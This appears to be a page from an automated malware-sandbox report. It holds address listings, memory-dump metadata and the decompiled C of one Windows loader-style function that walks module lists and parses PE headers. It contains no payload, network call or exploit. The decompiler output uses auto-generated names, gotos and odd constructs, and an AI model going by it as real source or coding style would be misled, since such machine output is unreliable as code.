0x050ee1e4
0x00000000
0x050a45a9
0x050a45a9
0x050a45b0
0x050ee1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x050a45b6
0x050a45b6
0x050a45b6
0x00000000
0x050a45b6
0x050a45b0
0x050a45a3
0x050a4599
0x050a458c
0x050a4582
0x00000000
0x00000000
0x00000000
0x00000000
0x050a41f4
0x050a423e
0x050a4241
0x050a45c0
0x050a45c4
0x00000000
0x050a45ca
0x050a45ca
0x00000000
0x050ee207
0x050ee20f
0x00000000
0x00000000
0x00000000
0x00000000
0x050a45d1
0x00000000
0x00000000
0x050a45ca
0x00000000
0x050a4247
0x050a4247
0x050a4247
0x050a4249
0x050a4249
0x050a4249
0x050a4251
0x050a4251
0x050a4257
0x050a425f
0x050a426e
0x050a4270
0x050a427a
0x050ee219
0x050ee219
0x050a4280
0x050a4282
0x050a4456
0x050a45ea
0x00000000
0x050a45f0
0x050ee223
0x00000000
0x050ee223
0x050a445c
0x050a445c
0x00000000
0x050a445c
0x00000000
0x050a4288
0x050a428c
0x050ee298
0x050a4292
0x050a4292
0x050a429e
0x050a42a3
0x050a42a7
0x050a42ac
0x050ee22d
0x050a42b2
0x050a42b2
0x050a42b9
0x050a42bc
0x050a42c2
0x050a42ca
0x050a42cd
0x050a42cd
0x050a42d4
0x050a433f
0x050a433f
0x050a42d6
0x050a42d6
0x050a42d9
0x050a42dd
0x050a42eb
0x050ee23a
0x050a42f1
0x050a4305
0x050a430d
0x050a4315
0x050a4318
0x050a431f
0x050a4322
0x050a432e
0x050a433b
0x050a433b
0x00000000
0x050a432e
0x050a42eb
0x050a434c
0x050a434e
0x050a4352
0x050a4359
0x050a435e
0x050a4361
0x050a436e
0x050a438a
0x050a438e
0x050a4396
0x050a439e
0x050a43a1
0x050a43ad
0x050a43bb
0x050a43bb
0x050a43ad
0x050a436e
0x050a43bf
0x050a43c5
0x050a4463
0x050a4463
0x050a43ce
0x050a43d5
0x050a43d9
0x050a43df
0x050a4475
0x050a4479
0x050a4491
0x050a4491
0x050a4479
0x050a43e5
0x050a43eb
0x050a43f4
0x050a43f6
0x050a43f9
0x050a43fc
0x050a43ff
0x050a44e8
0x050a44ed
0x050a44f3
0x050ee247
0x00000000
0x050a44f9
0x050a4504
0x050a4508
0x050a450f
0x050ee269
0x00000000
0x050a4515
0x050a4519
0x050a4531
0x050a4534
0x050a4537
0x050a453e
0x050a4541
0x050a454a
0x050ee255
0x050ee255
0x050ee25b
0x050ee25e
0x050ee261
0x050ee261
0x050a4555
0x050a4559
0x050a455d
0x050ee26d
0x050ee270
0x050ee274
0x050ee27a
0x050ee27d
0x050ee28e
0x050ee28e
0x050a4563
0x050a4563
0x050a4569
0x050a4569
0x00000000
0x050a455d
0x050a450f
0x00000000
0x050a44f3
0x050a43ff
0x050a4405
0x050a4405
0x050a4405
0x050a42ac
0x050a428c
0x050a4282
0x050a4407
0x050a440d
0x050ee2af
0x050ee2af
0x050a4413
0x050a4413
0x00000000
0x050a41d4
0x00000000
0x050a41c3
0x050a41bd
0x050a4415
0x050a4415
0x050a4416
0x050a4417
0x050a4429
0x050a416e
0x050a416e
0x050a4175
0x050a4498
0x050a449f
0x050ee12d
0x00000000
0x050ee133
0x00000000
0x050ee133
0x050a44a5
0x050a44a5
0x050a44aa
0x00000000
0x050a44bb
0x050a44ca
0x050a44d6
0x050a44d7
0x050a44d8
0x050a44e3
0x050a44e3
0x050a44aa
0x050a417b
0x050a417b
0x050a417b
0x00000000
0x050a417b
0x050a4175
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61406284e8ce2cc741988488b6889ab5a282861e30635dce6d2c301725a1f35b
Instruction ID: 1766fbd5eb2ea030fd9b6deb5443cf1ffb1aef80a224d30f2258ffbeb884b151
Opcode Fuzzy Hash: 61406284e8ce2cc741988488b6889ab5a282861e30635dce6d2c301725a1f35b
Instruction Fuzzy Hash: 1FF181756082118FCB64CF68E484A7EB7E6FF88704F55496EF886CB250E774D881CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0509D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0509D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x517d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E05096600(0x51752d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x5177b9c; // 0x0
							_t281 = L050A4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E050CF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x5177b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x5177b8c; // 0x33629e0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E050A2280(_t200, 0x51784d8);
									_t277 =  *0x51785f4; // 0x3363228
									_t351 =  *0x51785f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x33631c0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0509FFB0(_t287, _t353, 0x51784d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E050DCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E05096600(0x51752d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E05097926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x517b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0510E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x5178472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x517b218; // 0x0
														asm("ror edi, cl");
														 *0x517b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E050A2280(_t250, 0x51784d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L050C3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0509FFB0(_t293, _t353, 0x51784d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E050C37F5(_t353, 0);
																}
																E050C0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E050B9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E050B02D6(_t174);
																}
																L050A77F0( *0x5177b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E050BC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0509EC7F(_t353);
										L050B19B8(_t287, 0, _t353, 0);
										_t200 = E0508F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E050CB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x517b2f8; // 0xe80000
									if((_t206 |  *0x517b2fc) == 0 || ( *0x517b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x517b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E05136B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E05136AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0509E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0509EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E050C9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0509E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L05098F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E050C3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0509d5f2
0x0509d5f5
0x0509d5f5
0x0509d5fd
0x0509d600
0x0509d60a
0x0509d60d
0x0509d617
0x0509d61d
0x0509d627
0x0509d62e
0x0509d911
0x0509d913
0x00000000
0x0509d919
0x0509d919
0x0509d919
0x0509d634
0x0509d634
0x0509d634
0x0509d634
0x0509d640
0x0509d8bf
0x00000000
0x0509d646
0x0509d646
0x0509d64d
0x0509d652
0x050eb2fc
0x050eb2fc
0x050eb302
0x050eb33b
0x050eb341
0x00000000
0x050eb304
0x050eb304
0x050eb319
0x050eb31e
0x050eb324
0x050eb326
0x050eb332
0x050eb347
0x050eb34c
0x050eb351
0x050eb35a
0x00000000
0x050eb328
0x050eb328
0x00000000
0x050eb328
0x050eb326
0x0509d658
0x0509d658
0x0509d65b
0x0509d665
0x00000000
0x0509d66b
0x0509d66b
0x0509d66b
0x0509d66b
0x0509d66d
0x0509d672
0x0509d67a
0x00000000
0x00000000
0x0509d680
0x0509d686
0x0509d8ce
0x0509d8d4
0x0509d8dd
0x0509d8e0
0x0509d68c
0x0509d691
0x0509d69d
0x0509d6a2
0x0509d6a7
0x0509d6b0
0x0509d6b5
0x0509d6e0
0x0509d6b7
0x0509d6b7
0x0509d6b9
0x0509d6b9
0x0509d6bb
0x0509d6bd
0x0509d6ce
0x0509d6d0
0x0509d6d2
0x050eb363
0x050eb365
0x00000000
0x050eb36b
0x00000000
0x050eb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0509d6bf
0x0509d6bf
0x0509d6e5
0x0509d6e7
0x0509d6e9
0x0509d6ec
0x0509d6ec
0x0509d6ef
0x0509d6f5
0x0509d6f9
0x0509d6fb
0x0509d6fd
0x0509d701
0x0509d703
0x0509d70a
0x0509d70a
0x0509d701
0x0509d710
0x0509d710
0x0509d6c1
0x0509d6c1
0x0509d6c6
0x050eb36d
0x050eb36f
0x00000000
0x050eb375
0x050eb375
0x050eb375
0x00000000
0x050eb375
0x00000000
0x0509d6cc
0x0509d6d8
0x0509d6d8
0x0509d6d8
0x00000000
0x0509d6c6
0x0509d6bf
0x00000000
0x0509d6da
0x0509d6da
0x0509d716
0x0509d71b
0x0509d720
0x0509d726
0x0509d726
0x0509d72d
0x00000000
0x0509d733
0x0509d739
0x0509d742
0x0509d750
0x0509d758
0x0509d764
0x0509d776
0x0509d77a
0x0509d783
0x0509d928
0x0509d92c
0x0509d93d
0x0509d944
0x0509d94f
0x0509d954
0x0509d956
0x0509d95f
0x0509d961
0x0509d973
0x0509d973
0x0509d956
0x0509d944
0x0509d92c
0x0509d78b
0x050eb394
0x0509d791
0x0509d798
0x050eb3a3
0x050eb3bb
0x050eb3bb
0x0509d7a5
0x0509d866
0x0509d870
0x0509d884
0x0509d892
0x0509d898
0x0509d89e
0x0509d8a0
0x0509d8a6
0x0509d8ac
0x0509d8ae
0x0509d8b4
0x0509d8b4
0x0509d8ae
0x0509d7a5
0x0509d78b
0x0509d7b1
0x050eb3c5
0x050eb3c5
0x0509d7c3
0x0509d7ca
0x0509d7e5
0x0509d7eb
0x0509d8eb
0x0509d8ed
0x00000000
0x0509d8f3
0x0509d8f3
0x0509d8f3
0x00000000
0x0509d8ed
0x0509d7cc
0x0509d7cc
0x0509d7d2
0x00000000
0x0509d7d4
0x0509d7d4
0x0509d7d7
0x0509d7df
0x050eb3d4
0x050eb3d9
0x050eb3dc
0x050eb3dc
0x050eb3df
0x050eb3e2
0x050eb468
0x050eb46d
0x050eb46f
0x050eb46f
0x050eb475
0x0509d8f8
0x0509d8f9
0x0509d8fd
0x050eb3e8
0x050eb3e8
0x050eb3eb
0x050eb3ed
0x00000000
0x050eb3ef
0x050eb3ef
0x050eb3f1
0x050eb3f4
0x050eb3fe
0x050eb404
0x050eb409
0x050eb40e
0x050eb410
0x050eb410
0x050eb414
0x050eb414
0x050eb41b
0x050eb420
0x050eb423
0x050eb425
0x050eb427
0x050eb42a
0x050eb42d
0x050eb42d
0x050eb42a
0x050eb432
0x050eb436
0x050eb438
0x050eb43b
0x050eb43b
0x050eb449
0x050eb44e
0x050eb454
0x050eb458
0x050eb458
0x050eb45d
0x00000000
0x050eb45d
0x050eb3ed
0x00000000
0x00000000
0x00000000
0x0509d7df
0x0509d7d2
0x0509d7ca
0x050eb37c
0x050eb37e
0x050eb385
0x050eb38a
0x00000000
0x050eb38a
0x0509d742
0x0509d7f1
0x0509d7f8
0x050eb49b
0x050eb49b
0x0509d800
0x0509d837
0x0509d843
0x0509d845
0x0509d847
0x0509d84a
0x0509d84b
0x0509d84e
0x0509d857
0x0509d802
0x0509d802
0x0509d80d
0x00000000
0x0509d818
0x0509d818
0x0509d824
0x0509d831
0x050eb4a5
0x050eb4ab
0x050eb4b3
0x050eb4b8
0x050eb4bb
0x00000000
0x050eb4c1
0x050eb4c1
0x050eb4c8
0x00000000
0x050eb4ce
0x050eb4d4
0x050eb4e1
0x050eb4e3
0x050eb4e5
0x00000000
0x050eb4eb
0x050eb4f0
0x050eb4f2
0x0509dac9
0x0509dacc
0x0509dacf
0x0509dad1
0x0509dd78
0x0509dd78
0x0509dcf2
0x00000000
0x0509dad7
0x0509dad9
0x0509dadb
0x00000000
0x00000000
0x0509dae1
0x0509dae1
0x0509dae4
0x0509dae6
0x050eb4f9
0x050eb4f9
0x050eb500
0x0509daec
0x0509daec
0x0509daf5
0x0509daf8
0x0509dafb
0x0509db03
0x0509db11
0x0509db16
0x0509db19
0x0509db1b
0x050eb52c
0x050eb531
0x050eb534
0x0509db21
0x0509db21
0x0509db24
0x0509dcd9
0x0509dce2
0x0509dce5
0x0509dd6a
0x0509dd6d
0x00000000
0x0509dd73
0x050eb51a
0x050eb51c
0x050eb51f
0x050eb524
0x00000000
0x050eb524
0x0509dce7
0x0509dce7
0x0509dce7
0x00000000
0x0509dce7
0x00000000
0x0509db2a
0x0509db2c
0x0509db31
0x0509db33
0x0509db36
0x0509db39
0x0509db3b
0x0509db66
0x0509db66
0x0509db3d
0x0509db3d
0x0509db3e
0x0509db46
0x0509db47
0x0509db49
0x0509db4c
0x0509db53
0x0509db55
0x0509db58
0x0509db5a
0x050eb50a
0x050eb50f
0x050eb512
0x0509db60
0x0509db60
0x0509db63
0x0509db63
0x00000000
0x0509db63
0x0509db5a
0x0509db3b
0x0509db24
0x0509db69
0x0509db69
0x0509db6c
0x0509db6f
0x0509db74
0x050eb557
0x050eb557
0x050eb55e
0x0509db7a
0x0509db7c
0x0509db7f
0x0509db82
0x0509db85
0x00000000
0x0509db8b
0x0509db8b
0x0509db8d
0x0509db9b
0x0509db9b
0x0509db9d
0x0509dba0
0x0509dba2
0x0509dba4
0x0509dba7
0x0509dba9
0x0509dbae
0x0509dbae
0x0509dbb1
0x0509dbb4
0x0509dbb4
0x0509dbb7
0x0509dbba
0x0509dcd2
0x0509dcd4
0x00000000
0x0509dbc0
0x0509dbc0
0x0509dbd2
0x0509dbd7
0x0509dbda
0x0509dbdd
0x0509dbdf
0x00000000
0x0509dbe5
0x0509dbe5
0x0509dbee
0x0509dbf1
0x050eb541
0x050eb544
0x00000000
0x050eb546
0x050eb546
0x00000000
0x050eb546
0x0509dbf7
0x0509dbf7
0x0509dbfd
0x0509dbfd
0x0509dbff
0x0509dc0b
0x0509dc15
0x0509dc1b
0x0509dc1d
0x0509dc21
0x0509dc21
0x0509dc23
0x0509dc23
0x0509dc26
0x0509dc29
0x0509dc2b
0x00000000
0x00000000
0x0509dc31
0x0509dc34
0x0509dc36
0x0509dcbf
0x0509dcbf
0x0509dcc2
0x00000000
0x0509dc3c
0x0509dc41
0x0509dc43
0x00000000
0x0509dc45
0x0509dc45
0x0509dc47
0x00000000
0x0509dc4d
0x0509dc4d
0x0509dc50
0x0509dc52
0x0509dc55
0x0509dcfa
0x0509dcfe
0x0509dd08
0x0509dd0a
0x0509dd0c
0x00000000
0x0509dd12
0x0509dd15
0x0509dd2d
0x0509dd2f
0x0509dd32
0x0509dd35
0x00000000
0x0509dd35
0x0509dc5b
0x0509dc5b
0x0509dc5e
0x0509dc61
0x0509dc64
0x0509dc67
0x0509dc67
0x0509dc6a
0x0509dc6c
0x0509dc8e
0x0509dc8e
0x0509dc91
0x0509dc93
0x0509dcce
0x0509dcce
0x0509dc95
0x0509dc9c
0x0509dc6e
0x0509dc72
0x0509dc75
0x0509dc77
0x0509dc79
0x050eb551
0x050eb551
0x00000000
0x0509dc7f
0x0509dc7f
0x0509dc81
0x00000000
0x0509dc83
0x0509dc86
0x0509dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0509dc88
0x0509dc81
0x0509dc79
0x0509dc6c
0x0509dc55
0x0509dc47
0x0509dc43
0x00000000
0x0509dc36
0x0509dc23
0x00000000
0x0509dbff
0x0509dbf1
0x0509dbdf
0x0509db8f
0x0509db92
0x0509db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0509db95
